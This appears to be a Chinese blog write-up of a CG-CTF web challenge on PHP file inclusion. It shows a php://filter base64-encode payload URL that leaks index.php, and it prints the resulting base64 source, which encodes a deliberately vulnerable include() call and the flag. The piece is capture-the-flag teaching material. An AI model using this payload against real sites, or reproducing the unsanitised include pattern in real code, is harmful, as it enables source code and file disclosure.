CG-CTF-Web-文件包含

文件包含

1.查看题目
在这里插入图片描述
2.进去查看题目,看到下面第一幅图中的内容,我们点击这个超链接
在这里插入图片描述
3.点击上图的超链接后,出现下图所示
在这里插入图片描述
4.根据URL与题目名,可以知道这里应该是利用文件包含
(1)首先尝试…/,发现出现下图所示:
在这里插入图片描述
源代码也没有什么可以利用的:
在这里插入图片描述
(2)其实这里利用的是php伪协议,下图是index.php经过base64加密的源码

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述

  • 加密后的密文
PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=
  • 上图是使用的php://filter/read=convert.base64-encode/resource=index.php

  • 这里使用的过滤器是convert.base64-encode。它的作用就是读取index.php(这个你可以是经过测试show.php和index.php后得出的)的内容进行base64编码后输出。可以用于读取程序源代码经过base64编码后的数据

  • php伪协议简单介绍:

php://filter/[read/write]=string.[rot13/strip_tags/…..]/resource=xxx
filter和string过滤器连用可以对字符串进行过滤。filter的read和write参数有不同的应用场景:read用于include()和file_get_contents(),write用于file_put_contents()中。

php://filter/read=convert.base64-[encode/decode]/resource=xxx
这是使用的过滤器是convert.base64-encode。它的作用就是读取xxx文件的内容进行base64编码后输出。可以用于读取程序源代码经过base64编码后的数据

(3)接下来我们将base64密文解码,在线加密解密
在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值